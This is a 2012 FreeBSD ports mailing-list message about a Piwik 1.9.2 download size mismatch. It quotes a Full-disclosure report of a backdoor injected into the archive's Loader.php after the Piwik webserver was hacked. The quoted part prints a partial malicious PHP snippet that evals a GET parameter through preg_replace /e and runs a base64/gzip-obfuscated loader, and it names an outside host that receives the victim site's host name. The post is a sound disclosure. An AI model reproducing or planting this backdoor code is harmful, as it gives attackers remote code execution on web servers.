Hi, I just noticed http://piwik.org/blog/2012/11/security-report-piwik-org-webserver-hacked-for-a-few-hours-on-2012-nov-26th/ before I got this message.
I downloaded http://builds.piwik.org/piwik-1.9.2.tar.gz and compared it to my local copy of 1.9.2, and all files are unchanged. It's just the archiving that changed the file size. The Piwik build manager is a little bit sloppy ... Regards, Hans * Ruslan Mahmatkhanov <cvs-...@yandex.ru> [2012-11-27]: > => piwik-1.9.2.tar.gz doesn't seem to exist in /usr/ports/distfiles/. > => Attempting to fetch http://builds.piwik.org/piwik-1.9.2.tar.gz > fetch: http://builds.piwik.org/piwik-1.9.2.tar.gz: size mismatch: > expected 5676196, actual 5676058 > > > > -------- Original message -------- > Subject: [Full-disclosure] Possible infection of Piwik 1.9.2 download > archive > Date: Mon, 26 Nov 2012 21:17:57 +0100 > From: Maximilian Grobecker <m...@grobecker-wtal.de> > To: full-disclos...@lists.grok.org.uk > > Hi, > > this evening I downloaded a fresh archive of Piwik 1.9.2 and found this > code at the bottom of the /piwik/core/Loader.php file: > > (Just a short snippet) > -----------snip------------- > <?php Error_Reporting(0); if(isset($_GET['g']) && isset($_GET['s'])) { > preg_replace("/(.+)/e", $_GET['g'], 'dwm'); exit; > } > if (file_exists(dirname(__FILE__)."/lic.log")) exit; > eval(gzuncompress(base64_decode('eF6Fkl9LwzAUxb+KD0I3EOmabhCkD/OhLWNOVrF/IlKatiIlnbIOZ/bpzb2pAyXRl7uF/s > > > [.......] > > -----------/snip------------- > > > I decoded some parts of this code and found what it does: > It transmits the requested Host Name (from $_SERVER['HTTP_HOST']) and > the request URI via POST to http://prostoivse.com/x.php and creates a > file named "lic.log" in the same directory. > As long as this file exists it seems that no further POST requests are made. > > At the moment I'm trying to figure out the further sense of this code, > but it seems that there might also be some kind of backdoor (because of > the use of $_GET). > > The file in the downloadable archive is dated at > Nov 26, 2012 / 18:42 UTC. > > From forums I know that some people downloaded the archive earlier this > day and don't have this code inside their files. > > At the moment (at 8:08 PM UTC) the archive is downloadable at the > original Piwik web site with this obfuscated code. > > I contacted the developers and managers of Piwik a few minutes ago about > this. > > > -- > Greetings from Wuppertal, Germany > > Max Grobecker _______________________________________________ freebsd-ports@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-ports To unsubscribe, send any mail to "freebsd-ports-unsubscr...@freebsd.org"
